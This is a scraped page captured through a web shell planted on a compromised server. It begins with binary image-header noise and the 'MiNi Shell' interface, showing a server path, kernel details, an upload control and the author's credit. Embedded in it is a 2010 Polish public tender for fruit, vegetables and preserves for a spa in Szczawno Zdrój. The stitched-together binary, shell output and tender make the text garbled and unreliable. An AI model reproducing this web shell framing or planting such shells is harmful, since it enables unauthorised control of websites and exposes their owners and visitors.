JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/172605-N-2010.html

<p class="kh_header"><b>Szczawno Zdrój: Przedmiotem zamówienia są dostawy owoców, warzyw oraz przetworów do Punktów Żywienia Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju.</b><br>
<b>Numer ogłoszenia: 172605 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są dostawy owoców, warzyw oraz przetworów do Punktów Żywienia Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA DWA ZADANIA: 

Zadanie nr  1:    Dostawy  owoców i warzyw,
Zadanie nr  2:     Dostawy przetworów.

Zadanie nr 1
LP.	NAZWA I OPIS PRODUKTU	j.m.	PLANOW. ILOŚĆ
1	arbuz	                                 kg	640
2	banany	                         kg	270
3	brzoskwinie	                         kg	114
4	grejfrut	                         kg	50
5	gruszki (sezonowo)	         kg	20
6	cytryny	                         kg	380
7	kiwi	                                szt.	4650
8	jabłka (odmiany trwałe, dobrze znoszące transport, deserowe i na przetwory)	                                 kg	8150
9	mandarynki                         	kg	254
10	melon		                        szt     30
11	nektarynki	                        kg	112
12	pomarańcze	                        kg	633
13	śliwki świeże	                kg	40
14	botwinka (pęczek)	        szt.	480
15	buraki czerwone	                kg	6980
16	brukselka świeża             	kg	50
17	Cykoria sałatowa	               tacki	20
18	cebula	                       kg	2750
19	czosnek (pełne główki)	        kg	20
20	dynia	                                 kg	100
21	fasola sucha	                kg	580
22	fasolka szparagowa	          kg	120
23	jarmuż	                      pęczek	    20
24	groch suchy łuskany	           kg	380
25	kalarepa	                           kg	50
26	kabaczek (cukinia)	           kg	560
27	kalafior	                          szt.	300
28	kapusta biała	                  kg	2800
29	kapusta biała młoda	          kg	1050
30	kapusta czerwona	          kg	2450
31	kapusta pekińska	                  kg	4500
32	kapusta włoska 	                  kg	990
33	kapusta włoska młoda	          kg	280
34	kapusta kiszona	                  kg	3450
35	Koper 	                    pęczek	4730
36	marchew	                        kg	11450
37	ogórek zielony	                kg	2680
38	ogórki kiszone	                kg	2750
39	papryka świeża	                kg	1500
40	pieczarki	                        kg	520
41	pietruszka korzeń	                kg	2530
42	pietruszka nać	            pęczek	4530
43	por	                             szt.	1180
44	pomidor gruntowy	               kg	3330
45	pomidor szklarniowy	       kg	2500
46	rzodkiewka 	                    pęczek	6250
47	 rzodkiew biała	               kg	2300
48	sałata	                       szt.	19220
49	Sałata lodowa	               szt.	1400
50	Sałata dekoracyjna	       Szt.	150
51	seler korzeń	                        kg	5200
52	seler młody naciowy	       szt.	690
53	szczypior 	                    pęczek	5750
54	winogrona	                       kg	85
55	ziemniaki zimowe                 kg	39200	                                     
56	Ziemniaki młode                   kg	13000

Zadanie nr 2 Dostawy przetworów

1	sok owocowy 200 g (różne smaki) kartonik	FORTUNA, TYMBARK lub równoważne	szt.	1400
2	sok owocowy 1 l. (różne smaki, karton)	FORTUNA, TYMBARK lub równoważne	szt.	770
3	sok owocowy 330 ml (różne smaki)	KUBUŚ, PYSIO lub równoważne	szt.	500
4	sok owocowy 1l (różne smaki)	KUBUŚ, PYSIO lub równoważne	szt.	370
5	Syrop owocowy wysokosłodzony 0,5l	PAOLA, HERBAPOL lub równoważne	szt.	430
6	kompot owocowy (różne smaki) 900g	PTAK lub równoważne	szt.	720
7	ananas w syropie  550 g (plastry)	SKO, BAKALLAND lub równoważne	szt.	420
8	brzoskwinie w syropie 820 g (połówki)	SKO lub równoważne	szt.	350
9	mieszanka koktajlowa 200g	SKO lub równoważne	szt.	120
10	seler konserwowy 400g	PTAK lub równoważne	szt.	600
11	fasolka czerwona konserwowa 400g	PTAK lub równoważne	szt.	200
12	szparagi konserwowe 330 g	ROLNIK lub równoważne	szt.	65
13	kukurydza (małe kolby) konserwowa 300 g	ROLNIK lub równoważne	szt.	30
14	cebulka konserwowa 200 g.	PTAK lub równoważne	szt.	25
15	pieczarki konserwowe 900 g	PTAK lub równoważne	szt.	70
16	patisony konserwowe 900 g	PTAK lub równoważne	szt.	30
17	sałatka warzywna szwedzka 900 g	PTAK lub równoważne	szt.	450
18	sałatka warzywna (inna) 900 g	PTAK lub równoważne	szt.	650
19	buraczki konserwowe 900g	ROLNIK lub równoważne	szt.	280
20	oliwki zielone (bez pestki) 900g	ROLNIK lub równoważne	szt.	40
21	oliwki czarne (bez pestki) 900g	ROLNIK lub równoważne	szt.	40
22	Ćwikła 330g	ROLNIK lub równoważne	szt.	370
23	chrzan konserwowy 300g	PTAK lub równoważne	szt.	640
24	Barszcz czerwony - koncentrat w płynie	KRAKUS, ROLNIK lub równoważne	szt.	40
25	groszek konserwowy  400g	PTAK lub równoważne	szt.	450
26	koncentrat pomidorowy 30 %, 4500 g	KNORR lub równoważne	szt.	50
27	koncentrat pomidorowy 30 %, 800 g	KNORR lub równoważne	szt.	720
28	kukurydza konserwowa  380 g	PTAK lub równoważne	szt.	1700
29	ogórki konserwowe  900 g	PTAK lub równoważne	szt.	780
30	papryka konserwowa  900 g	PTAK lub równoważne	szt.	550
31	papryka konserwowa 4500g 	PTAK lub równoważne	szt.	20
32	Szczaw konserwowy 0,5 kg	-------------------------------	szt.	200
33	żurawina  295 g	ROLNIK lub równoważne	szt.	200
34	dżem owocowy niskosłodzony (różne smaki) 1000 g	PSZCZÓŁKA, ŁOWICZ lub równoważne	kg	7050
35	dżem owocowy niesłodzony (bez cukru) 	PSZCZÓŁKA, ŁOWICZ lub równoważne	szt.	20
36	powidła (różne smaki) 1000 g	PSZCZÓŁKA, ŁOWICZ lub równoważne	kg	1300
37	morele suszone	BAKALLAND lub równoważne	kg	15
38	śliwki suszone	BAKALLAND lub równoważne	kg	30
39	susz świąteczny	BAKALLAND lub równoważne	kg	36
40	grzyby suszone	BAKALLAND lub równoważne	kg	10
41	masa makowa	BAKALLAND lub równoważne	kg	110
42	rodzynki	BAKALLAND	kg	10
43	miód wielokwiatowy 500g	--------------------------	szt.	30
44	miód wielokwiatowy catering 25g	-------------------------	szt.	1800
45	majonez 330g	ŚWIDNICKI lub równoważny	szt.	450
46	majonez 900g	ŚWIDNICKI lub równoważny	szt.	600
47	ocet 0,5 l	-------------------------	szt.	480
48	musztarda 900g różne gatunki	KAMIS, PUDLISZKI, ROLESKI lub równoważne	szt.	50
49	musztarda 200g różne gatunki	KAMIS, PUDLISZKI, ROLESKI lub równoważne	szt.	780
50	ketchup 1000g	KNORR, PUDLISZKI lub równoważne	szt.	360
51	sosy do lodów (różne smaki)1000g	KNORR lub równoważne	szt.	70.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.00.00-0, 15.33.22.90-3, 15.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	Oświadczenia o braku podstaw do wykluczenia na mocy art.24 ust.1 ustawy pzp - Wzór oświadczenia Załącznik nr 4 do SIWZ.
b.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt 2 ustawy pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych wpis do ewidencji działalności gospodarczej Wykonawców będących osobami fizycznymi i zgodnie z ustawa z dnia 19.11.1999r. Prawo o działalności gospodarczej sa zobowiązane do dokonania takiego wpisu.

Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.
Niespełnienie chociażby jednego z opisanych warunków skutkować będzie wykluczeniem oferenta z zastrzeżeniem art. 26 ust. 3 i 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (teks jednolity Dz. U. z 2007r, Nr 223, poz. 1655 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie 3 ostatnich lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie). Wykaz winien zawierać
listę co najmniej dwóch dostaw odpowiadających swym rodzajem dostawom
stanowiącym przedmiot niniejszego zamówienia, tj. dostawom owoców, warzyw oraz przetworów, o wartości nie mniejszej niż 90 tyś. zł brutto (dla Zadania nr 1) oraz 70 tyś. zł brutto (dla Zadania nr 2) z podaniem przedmiotu zamówienia, daty wykonania zadania, nazwy (firmy) odbiorcy i wartości wraz z załączeniem dokumentu potwierdzającego należyte wykonanie lub wykonywanie dostaw (np. referencje). Wzór wykazu - Załącznik nr 6 do SIWZ;
b.	aktualna decyzja lub zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej dopuszczająca środek transportu do przewozu artykułów spożywczych będących przedmiotem zamówienia;
c.	oświadczenie o oferowaniu produktów spełniających obowiązujące wymagania i normy jakościowe zgodnie z wymaganiami zawartymi w Polskich Normach, a ponadto odpowiednie wymogi jakościowe dla żywienia w warunkach zbiorowych oraz cechujące się wysokimi walorami smakowymi, a także posiadaniu na oferowane produkty wszelkich niezbędnych dokumentów badań i dopuszczeń do obrotu, certyfikatów i atestów wymaganych przez normy i przepisy mające zastosowanie. Wykonawcy zobowiązani będą do przedłożenia na każde żądanie Zamawiającego kopii tych dokumentów. Wzór oświadczenia - Załącznik nr 5 do SIWZ.
Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełnia  w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.
Niespełnienie chociażby jednego z opisanych warunków skutkować będzie wykluczeniem oferenta z zastrzeżeniem art. 26 ust. 3 i 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (teks jednolity Dz. U. z 2007r, Nr 223, poz. 1655 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	opłacona polisa ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 90 tys. zł.;



Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.
Niespełnienie chociażby jednego z opisanych warunków skutkować będzie wykluczeniem oferenta z zastrzeżeniem art. 26 ust. 3 i 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (teks jednolity Dz. U. z 2007r, Nr 223, poz. 1655 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a.	wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie 3 ostatnich lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie). Wykaz winien zawierać
listę co najmniej dwóch dostaw odpowiadających swym rodzajem dostawom
stanowiącym przedmiot niniejszego zamówienia, tj. dostawom owoców, warzyw oraz przetworów, o wartości nie mniejszej niż 90 tyś. zł brutto (dla Zadania nr 1) oraz 70 tyś. zł brutto (dla Zadania nr 2) z podaniem przedmiotu zamówienia, daty wykonania zadania, nazwy (firmy) odbiorcy i wartości wraz z załączeniem dokumentu potwierdzającego należyte wykonanie lub wykonywanie dostaw (np. referencje). Wzór wykazu - Załącznik nr 6 do SIWZ;
b.	aktualna decyzja lub zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej dopuszczająca środek transportu do przewozu artykułów spożywczych będących przedmiotem zamówienia;
c.	oświadczenie o oferowaniu produktów spełniających obowiązujące wymagania i normy jakościowe zgodnie z wymaganiami zawartymi w Polskich Normach, a ponadto odpowiednie wymogi jakościowe dla żywienia w warunkach zbiorowych oraz cechujące się wysokimi walorami smakowymi, a także posiadaniu na oferowane produkty wszelkich niezbędnych dokumentów badań i dopuszczeń do obrotu, certyfikatów i atestów wymaganych przez normy i przepisy mające zastosowanie. Wykonawcy zobowiązani będą do przedłożenia na każde żądanie Zamawiającego kopii tych dokumentów. Wzór oświadczenia - Załącznik nr 5 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Pozostałe dokumenty:
a.	pełnomocnictwo w przypadku składania oferty wspólnej,
b.	pełnomocnictwo do działania w imieniu Wykonawcy zgodnie z przepisami Kodeksu Cywilnego, w przypadku, gdy ofertę składa osoba nieupoważniona do reprezentowania Wykonawcy z mocy prawa,
c.	zaparafowany projekt umowy - Projekt umowy stanowi Załącznik nr 3 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Najistotniejsze postanowienia umowy zawarto w Projekcie Umowy stanowiącym Załącznik nr 3 do SIWZ.

Zamawiający przewiduje zmianę umowy w następujących przypadkach:
-  jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna);
-  jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia.

Zamawiający przewiduje odstąpienie od umowy w następujących przypadkach:
1.	Zamawiający może odstąpić od Umowy lub jej części, gdy:
-   Wykonawca dostarczy towar złej jakości,
- zostanie zgłoszony wniosek o upadłość lub podjęta uchwała o rozwiązaniu firmy Wykonawcy,
-  zostanie wydany nakaz zajęcia majątku Wykonawcy,
- Wykonawca nie rozpoczął realizacji przedmiotu umowy oraz nie kontynuuje jej pomimo wezwania Zamawiającego złożonego na piśmie,
- w wypadku stwierdzenia przez Zamawiającego wady przedmiotu umowy, której Wykonawca pomimo trzykrotnego wezwania nie usunął,
- w przypadku zwłoki w terminie dostawy stwierdzonej minimum 3 razy,
- w przypadku naruszenia przez Wykonawcę, któregokolwiek z postanowień umowy,
- wystąpi istotna zmiana okoliczności powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia Umowy. Zamawiający w tym przypadku może od Umowy odstąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia w formie pieniężnej należnego mu z tytułu wykonania części Umowy do momentu odstąpienia od Umowy,
2.	Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli:
- Zamawiający nie przystąpi do odbioru, odmawia odbioru zamówionego towaru bez uzasadnionych przyczyn,
- Zamawiający zawiadomi Wykonawcę, iż wobec zaistnienia uprzednio nieprzewidzianych okoliczności nie będzie mógł spełnić zobowiązań umownych wobec Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.szczawno-jedlina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A.
ul. Ratuszowa 1,58-310 Szczawno Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A., ul. Ratuszowa 1, 58-310 Szczawno Zdrój, Kancelaria ( I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com